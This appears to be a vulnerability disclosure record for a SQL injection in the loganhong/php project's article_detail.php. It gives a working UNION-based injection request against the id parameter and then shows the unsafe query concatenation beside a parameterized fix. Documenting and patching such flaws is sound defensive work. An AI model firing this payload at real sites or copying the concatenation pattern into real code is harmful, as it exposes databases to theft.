| Title | loganhong php 1 SQL Injection |
|---|---|
| Description | Set up this project: https://github.com/loganhong/php. In the project file /includes/article_detail.php, the code directly concatenates the variable $id into the SQL query statement without any escaping or parameterization. Set up locally and test using sqlmap. |

Request sent with Burp Suite:

```http
GET /php-master/includes/article_detail.php?id=-7161%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7170707171,0x746978664a47627a6f7a62737361695a467564686d44666678624b736b6c414f594552456975546c,0x7171627071),NULL,NULL,NULL--%20-%20--- HTTP/1.1
Host: 127.0.0.1
sec-ch-ua: "Chromium";v="129", "Not=A?Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
```

Obtained the data.
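The concatenation the report describes, placed next to a parameterized replacement, as an added illustration that is not code from the loganhong/php project; the table and column names (article, id, title, body) and the PDO connection are assumptions.

```php
<?php
// Added illustration, not the project's own code. Table and column names
// (article, id, title, body) and the PDO connection $db are assumptions.

// Pattern the report describes: $id goes straight into the SQL text, so the
// database parses whatever the client sent as part of the statement.
function fetchArticleUnsafe(PDO $db, string $id): ?array
{
    $sql = "SELECT * FROM article WHERE id = " . $id;   // no escaping, no placeholder
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hardened replacement: validate the type first, then bind the value as a
// parameter so it is never interpreted as SQL.
function fetchArticleSafe(PDO $db, string $rawId): ?array
{
    // Article ids are positive integers; anything else is rejected before a
    // query is built, which also stops "-7161 UNION ..." style input outright.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    $stmt = $db->prepare('SELECT id, title, body FROM article WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Assumed usage in article_detail.php: $db is a PDO instance created with
// PDO::ATTR_EMULATE_PREPARES => false so the server performs the binding.
// $article = fetchArticleSafe($db, $_GET['id'] ?? '');
```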
| Source | https://github.com/ssiled/cve/issues/1 |
|---|---|
| User | silence. (UID 93672) |
| Submission | 19/12/2025 05:23 PM (4 months ago) |
| Moderation | 21/12/2025 05:41 PM (2 days later) |
| Status | Approved |
| VulDB Entry | 337720 [loganhong php loganSite up to c035fb5c3edd0b2a5e32fd4051cbbc9e61a31426 Article article_detail.php id sql injection] |
| Points | 20 |